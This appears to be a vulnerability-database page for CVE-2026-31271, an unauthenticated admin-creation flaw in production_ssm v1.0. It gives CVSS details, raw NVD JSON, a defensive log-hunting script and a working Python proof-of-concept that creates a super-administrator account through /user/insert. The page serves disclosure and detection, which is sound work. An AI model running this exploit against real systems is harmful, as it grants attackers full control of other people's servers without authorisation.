Security Vulnerability Report
CVE-2026-31271 CVSS 9.8 CRITICAL

Published: 2026-04-07 18:16:41
Last Modified: 2026-04-09 14:16:30

Description

megagao production_ssm v1.0 contains an authorization bypass vulnerability in the user addition functionality. The insert() method in UserController.java lacks authentication checks, allowing unauthenticated attackers to create super administrator accounts by directly accessing the /user/insert endpoint. This leads to complete system compromise.
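The advisory describes a missing authentication check on the /user/insert handler, so the defender's first question is whether anyone reached that endpoint without having logged in. The script below is an added example for this page, not code from the advisory or from the production_ssm project: it walks access-log lines in combined log format and flags requests to /user/insert from clients that never completed a login in the same window. The login route (/login), the log format and the sample lines are assumptions labelled in the code; the only fact taken from the advisory is the /user/insert path.

```python
import re
from dataclasses import dataclass

# Combined-log-format line from a hypothetical reverse proxy in front of the app.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

VULN_PATH = "/user/insert"   # endpoint named in the advisory
LOGIN_PATH = "/login"        # hypothetical: the advisory does not name the login route


@dataclass
class Hit:
    ip: str
    ts: str
    method: str
    status: str


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_unauthenticated_inserts(lines):
    """Flag requests to /user/insert from clients that never completed a login.

    A client counts as logged in once it has received a 2xx/3xx response to a
    POST on LOGIN_PATH earlier in the window. Every HTTP method on VULN_PATH is
    flagged, because a Spring MVC @RequestMapping with no method attribute
    accepts all of them.
    """
    logged_in = set()
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line: skip it rather than abort the hunt
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path == LOGIN_PATH and rec["status"][0] in "23":
            logged_in.add(rec["ip"])
        elif path == VULN_PATH and rec["ip"] not in logged_in:
            hits.append(Hit(rec["ip"], rec["ts"], rec["method"], rec["status"]))
    return hits


# Constructed sample log: one legitimate admin flow, one unauthenticated hit,
# and one unparsable line.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Apr/2026:18:20:01 +0000] "POST /login HTTP/1.1" 302 0',
    '10.0.0.5 - - [07/Apr/2026:18:20:09 +0000] "POST /user/insert HTTP/1.1" 200 25',
    '203.0.113.7 - - [07/Apr/2026:18:21:30 +0000] "POST /user/insert HTTP/1.1" 200 25',
    '203.0.113.7 - - [07/Apr/2026:18:21:31 +0000] "GET /user/list HTTP/1.1" 200 1340',
    'not a log line',
]

if __name__ == "__main__":
    for hit in find_unauthenticated_inserts(SAMPLE_LOG):
        print(f"[!] {hit.ts} {hit.ip} {hit.method} {VULN_PATH} -> {hit.status}")
```

This is a heuristic, not proof: a client that shares an IP with a legitimate administrator (NAT, a proxy) is not flagged, and an access log cannot show whether the request actually created an account. Pair the hits with the application's own user table (accounts with a super-administrator role and a creation time matching a flagged request) before declaring compromise.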

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-288 (Authentication Bypass Using an Alternate Path or Channel)

Configurations (Affected Products)

No CPE configuration data is available yet; the NVD entry is still in "Awaiting Analysis" status. The affected product named in the description is:

megagao production_ssm v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit(target_url):
    """
    Exploit for CVE-2026-31271: Authorization bypass in user addition.
    Creates a super administrator account without authentication.
    """
    # The vulnerable endpoint
    endpoint = "/user/insert"
    url = f"{target_url}{endpoint}"

    # Payload to create a new super admin
    # Adjust field names based on the actual backend implementation
    payload = {
        "username": "admin2",
        "password": "password123",
        "role": "1",  # Assuming '1' represents the super admin role
        "email": "[email protected]",
    }

    try:
        # No session cookie or token is sent: the request is deliberately unauthenticated.
        response = requests.post(url, data=payload, timeout=10)
        # A 200 only proves the handler answered; confirm creation by logging in
        # as the new user or checking the user list before reporting success.
        if response.status_code == 200:
            print("[+] Exploit successful! Super admin account created.")
            print(f"[+] Username: {payload['username']}, Password: {payload['password']}")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    target = "http://127.0.0.1:8080"  # Replace with actual target
    exploit(target)

References

https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/Unauthorized.md

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-31271",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T18:16:41.000",
    "lastModified": "2026-04-09T14:16:30.317",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "megagao production_ssm v1.0 contains an authorization bypass vulnerability in the user addition functionality. The insert() method in UserController.java lacks authentication checks, allowing unauthenticated attackers to create super administrator accounts by directly accessing the /user/insert endpoint. This leads to complete system compromise."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-288"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/Unauthorized.md",
        "source": "[email protected]"
      }
    ]
  }
}